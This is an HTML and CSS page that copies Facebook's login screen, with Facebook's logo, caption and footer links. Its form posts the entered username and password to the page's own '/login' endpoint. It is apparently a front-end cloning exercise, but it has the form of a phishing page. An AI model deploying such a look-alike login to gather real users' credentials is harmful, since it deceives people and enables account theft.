<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width" />
    <title>Facebook login</title>
    <link
      rel="icon"
      href="https://cdn.iconscout.com/icon/free/png-512/facebook-social-media-fb-logo-square-44659.png"
    />
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css"
    />

    <style>
.eyee {
  height: 16px;
  width: 16px;
  background: #000;
}

.global-container {
  margin: 0 auto;
  position: relative;
}

.bigger-box {
  padding-bottom: 112px;
  padding-top: 72px;
  min-width: 500px;
  /* background-image: url(./images/winter.gif); */
}

.big-box {
  display: block;
  width: 1262px;
  margin: 0 auto;
  padding: 20px 0;
  position: relative;
}

.left-box {
  width: 400px;
  box-sizing: border-box;
  margin-left: 150px;
  margin-right: 20px;
  padding-right: 32px;
  display: inline-block;
  vertical-align: top;
}

.image-box {
  padding: 112px 0 16px;
}

.fb-logo {
  height: 106px;
  margin: -28px;
  border: 0;
}

.logo-caption {
  font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
  font-size: 28px;
  font-weight: normal;
  line-height: 28px;
  width: 490px;
  padding: 0 0 20px;
  display: inline-block;
  letter-spacing: normal;
  margin: 0px;
}

.right-box {
  display: inline-block;
  vertical-align: top;
  height: 456px;
  width: 396px;
}

@media only screen and (max-width: 1125px) {
  .right-box {
    float: right;
  }
}

.email-box {
  border-radius: 6px;
  font-size: 17px;
  padding: 14px 16px;
  width: 330px;
  background: white;
  border: 1px solid lightgray;
  height: 22px;
  line-height: 16px;
  vertical-align: middle;
}

.pw-box {
  border-radius: 6px;
  font-size: 17px;
  padding: 14px 16px;
  width: 330px;
  background: white;
  border: 1px solid lightgray;
  height: 22px;
  line-height: 16px;
  vertical-align: middle;
}

.email-box:focus,
.pw-box:focus {
  outline: 1px solid rgb(25, 120, 243);
  outline-offset: -2px;
}

.login-button {
  background-color: rgb(25, 120, 243);
  border: none;
  border-radius: 6px;
  font-size: 20px;
  color: white;
  line-height: 48px;
  padding: 0 16px;
  width: 364px;
  vertical-align: middle;
}

.login-button:hover {
  background-color: rgb(23, 112, 230);
  cursor: pointer;
}

.create-button {
  border: none;
  border-radius: 6px;
  font-size: 17px;
  line-height: 48px;
  padding: 0 16px;
  background-color: rgb(67, 184, 43);
  color: white;
  margin-left: 90px;
  margin-top: 24px;
  margin-bottom: 24px;
}

.create-button:hover {
  background-color: rgb(55, 165, 33);
  cursor: pointer;
  text-decoration: none;
}

.create-button a {
  color: #fff;
}

.create-button a:hover {
  text-decoration: none;
}

.line {
  align-items: center;
  border-bottom: 1px solid lightgray;
  display: flex;
  margin: 6px 16px 0px;
  text-align: center;
}

.adjust-forgot-pw {
  margin-left: 107.5px;
  color: rgb(25, 120, 243);
  font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
  font-size: 14px;
}

.form-container {
  align-items: center;
  background-color: white;
  border: none;
  border-radius: 14px;
  box-shadow: 0 2px 40px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
  box-sizing: border-box;
  width: 397px;
  height: 345px;
  margin: 40px;
  padding: 10px;
  margin-left: 150px;
}

.space {
  padding: 6px;
}

.spaceTwo {
  padding: 0px 6px;
}

.adjust {
  margin: 10px;
}

.adjustTwo {
  margin: 10px 10px 16px;
}

a {
  text-decoration: none;
  cursor: pointer;
}

a:hover {
  color: rgb(25, 120, 243);
  text-decoration: underline;
}

.bottom-link-box {
  color: #1c1e21;
  font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
  font-size: 14px;
  font-weight: normal;
  padding-top: 0;
  margin-top: -12.5px;
  margin-left: 150px;
  text-align: center;
  width: 400px;
  height: 100px;
}

.bottom-link {
  color: black;
}

.bottom-link:hover {
  color: black;
  text-decoration: underline;
}

body {
  background: #fff;
  color: rgb(27, 29, 32);
  direction: ltr;
  line-height: 1.34;
  margin: 0;
  padding: 0;
  unicode-bidi: embed;
}

.list-items {
  display: inline-block;
  font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
  color: rgb(138, 141, 145);
  font-size: 12px;
  margin: 2.5px;
}

.list-items:hover {
  color: rgb(138, 141, 145);
  text-decoration: underline;
}

.plus-button {
  width: 25px;
  font-weight: bold;
  font-size: 10px;
}

.line-2 {
  align-items: center;
  border-bottom: 1px solid lightgray;
  display: flex;
  margin: 20px 16px;
  text-align: center;
}

footer {
  text-align: justify;
  background-image: url(https://i.imgur.com/LLoz1n1.gif);
  display: block;
  width: 1200px;
  margin: 0 auto;
}

.reduce-margin {
  margin-top: 0px;
  margin-bottom: 0px;
}

@media only screen and (max-width: 1125px) {
  .bigger-box {
    padding-bottom: 170px;
    padding-top: 0px;
    margin-top: -90px;
  }

  .big-box {
    display: flex;
    flex-direction: column;
    text-align: center;
    height: 496px;
    margin: 0 40px;
    width: auto;
  }

  .left-box {
    margin: 0 auto;
    padding: 0;
  }

  .logo-caption {
    font-size: 24px;
    line-height: 28px;
    width: auto;
    padding: 0;
  }

  .right-box {
    float: none;
    margin: 0 auto;
    padding: 40px;
  }

  .form-container {
    float: none;
    margin: 0 auto;
  }

  .adjust {
    float: none;
    margin: 1 auto;
    height: 25px;
  }

  .adjust-forgot-pw {
    float: none;
    margin: 0 auto;
    height: 25px;
  }

  .spaceTwo {
    margin-bottom: 16px;
  }

  .line {
    margin: 10px 8px;
  }

  .create-button {
    display: flex;
    flex-direction: column;
    text-align: center;
  }

  .bottom-link-box {
    float: none;
    margin: 0 auto;
    margin-top: 25px;
    height: 25px;
  }

  footer {
    margin: 20px;
    margin-right: 55px;
    width: auto;
  }

  ul {
    margin: 0px;
    width: auto;
  }

  .line-2 {
    margin: 7.5px;
    margin-left: 45px;
    width: auto;
  }

  .fb-clone {
    margin-top: 10px;
    width: auto;
  }
}

@media only screen and (max-width: 480px) {
  .global-container {
    width: fit-content;
    height: fit-content;
  }

  .contains-top-half-and-footer-bottom-half {
    width: fit-content;
    height: fit-content;
  }

  body {
    width: fit-content;
    height: fit-content;
  }
}

    </style>
  
  </head>
  <body>
    <div class="contains-top-half-and-footer-bottom-half">
      <div class="global-container">
        <div class="bigger-box">
          <div class="big-box">
            <div class="left-box">
              <div class="image-box">
                <img
                  class="fb-logo"
                  src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
                  alt=""
                />
              </div>
              <h2 class="logo-caption">
                Connect with the freinds and the world around you on Facebook.
              </h2>
            </div>
            <div class="right-box">
              <div class="form-container">
                <form action="/login" method="post">
                  <div class="space">
                    <input
                      type="text"
                      class="email-box"
                      name="username"
                      placeholder="Email address or phone number"
                    />
                  </div>
                  <div style="display: flex">
                    <div class="space">
                      <input
                        type="password"
                        name="password"
                        class="pw-box"
                        placeholder="Password"
                        id="password_field"
                      />
                    </div>
                    <i class="eyee"
                      class="far fa-eye-slash"
                      id="toggleEyeIcon"
                      style="cursor: pointer; display: none; margin: 24px -42px"
                    ></i>
                  </div>
                  <div class="space">
                    <button type="sumbit" class="login-button">
                      <b>Log In</b>
                    </button>
                  </div>
                  <div class="spaceTwo adjustTwo">
                    <a href="####" class="adjust-forgot-pw">Forgotten password?</a>
                  </div>
                  <div class="line"></div>
                  <div>
                    <a href="/loginreg">
                    <button type="button" class="create-button">
                      <b>Create New Account</b>
                    </button>
                  </a>
                  </div>
                </form>
              </div>
              <div class="bottom-link-box">
                <a class="bottom-link" href="/loginreg"><b>Create a Page</b></a>
                for a celebrity, brand or business.
              </div>
            </div>
          </div>
        </div>
      </div>
      <footer>
        <div>
          <ul>
            <li class="list-items">English (UK)</li>
            <li class="list-items">
              <a class="list-items" href="#">中文(简体)</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Bahasa Indonesia</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">日本語</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">ภาษาไทย</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Tiếng Việt</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">한국어</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Español</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Português (Brasil)</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Français (France)</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Deutsch</a>
            </li>
            <button type="button" class="plus-button">+</button>
          </ul>
          <div class="line-2 reduce-margin"></div>
          <ul>
            <li class="list-items">
              <a class="list-items" href="#">Messenger</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Fb Lite</a>
            </li>
            <li class="list-items"><a class="list-items" href="#">Watch</a></li>
            <li class="list-items">
              <a class="list-items" href="#">People</a>
            </li>
            <li class="list-items"><a class="list-items" href="#">Pages</a></li>
            <li class="list-items">
              <a class="list-items" href="#">Page Categories</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Places</a>
            </li>
            <li class="list-items"><a class="list-items" href="#">Games</a></li>
            <li class="list-items">
              <a class="list-items" href="#">Locations</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Marketplace</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Fb Pay</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Groups</a>
            </li>
            <li class="list-items"><a class="list-items" href="#">Jobs</a></li>
            <li class="list-items">
              <a class="list-items" href="#">Occulus</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Portal</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Instagram</a>
            </li>
            <li class="list-items"><a class="list-items" href="#">Local</a></li>
            <li class="list-items">
              <a class="list-items" href="#">Fundraisers</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Services</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Spark AR</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Shops</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Voting Information Centre</a>
            </li>
            <li class="list-items"><a class="list-items" href="#">About</a></li>
            <li class="list-items">
              <a class="list-items" href="#">Create ad</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Create Page</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Developers</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Careers</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Privacy</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">Cookies</a>
            </li>
            <li class="list-items">
              <a class="list-items" href="#">AdChoices</a>
            </li>
            <li class="list-items"><a class="list-items" href="#">Terms</a></li>
            <li class="list-items"><a class="list-items" href="#">Help</a></li>
          </ul>
        </div>
      </footer>
    </div>
    <script src="./js/toggleEyeIcon.js"></script>
  </body>
</html>
